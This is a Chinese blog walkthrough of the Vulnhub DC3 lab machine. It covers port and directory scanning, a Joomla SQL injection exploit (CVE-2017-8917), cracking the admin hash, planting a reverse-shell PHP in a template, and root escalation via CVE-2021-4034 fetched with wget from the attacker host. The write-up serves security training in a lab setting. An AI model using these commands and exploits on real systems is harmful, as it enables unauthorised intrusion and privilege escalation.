Vulnhub靶机:DC3

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:DC3(10.0.2.56)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.56

Vulnhub靶机:DC3_第1张图片

使用nmap端口扫描发现靶机开放端口:80

Vulnhub靶机:DC3_第2张图片

打开网站发现是一个登录界面,查看源码未发现隐藏信息

Vulnhub靶机:DC3_第3张图片

使用gobuster和dirsearch工具进行目录爆破

gobuster dir -u http://10.0.2.56/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dirsearch -u http://10.0.2.56

Vulnhub靶机:DC3_第4张图片
Vulnhub靶机:DC3_第5张图片

目录爆破发现/administrator/目录,访问发现该网站为joomla! cms搭建的

Vulnhub靶机:DC3_第6张图片

使用droopescan工具扫描网站探测joomla!的版本信息,发现为3.7.0-3.8.0左右

droopescan scan -u http://10.0.2.56     

Vulnhub靶机:DC3_第7张图片

三、漏洞利用

使用searchsploit搜索joomla!的历史漏洞,主要查看joomla!版本为3.7-3.8的exp

searchsploit joomla!    

Vulnhub靶机:DC3_第8张图片

发现一个sql注入exp,但该exp为php版本的,尝试运行了一下有点问题

我又在网上找了一个python版本的exp:CVE-2017-8917,运行获得管理员的账号和密码

python CVE-2017-8917.py http://10.0.2.56

admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

Vulnhub靶机:DC3_第9张图片

将密码复制到passwd.txt,使用john工具进行暴力破解得到:snoopy

john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

Vulnhub靶机:DC3_第10张图片

使用管理员账号密码登录网站

Vulnhub靶机:DC3_第11张图片

点击Extension->Templates->Templates

Vulnhub靶机:DC3_第12张图片

随便点击一项,我们这里点击Beez3

Vulnhub靶机:DC3_第13张图片

点击左边的文件,我们可以修改php代码

Vulnhub靶机:DC3_第14张图片

直接将php文件里面的代码跟换为反弹shell的php代码

Vulnhub靶机:DC3_第15张图片

然后点击Template Preview访问修改后的php文件进行反弹shell

Vulnhub靶机:DC3_第16张图片
Vulnhub靶机:DC3_第17张图片

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

Vulnhub靶机:DC3_第18张图片

四、提权

运行命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现/usr/lib/policykit-1/polkit-agent-helper-1文件,该版本的polkit存在提权漏洞CVE-2021-4034

Vulnhub靶机:DC3_第19张图片

靶机存在gcc环境

在这里插入图片描述

在攻击机开启apache2服务,靶机使用wget命令将exp下载下来

攻击机:service apache2 start
靶机:wget http://10.0.2.15/CVE-2021-4034.c

Vulnhub靶机:DC3_第20张图片

将exp编译执行,提权成功

gcc CVE-2021-4034.c -o CVE-2021-4034
./CVE-2021-4034

Vulnhub靶机:DC3_第21张图片

获取flag

Vulnhub靶机:DC3_第22张图片

你可能感兴趣的:(靶场,web安全)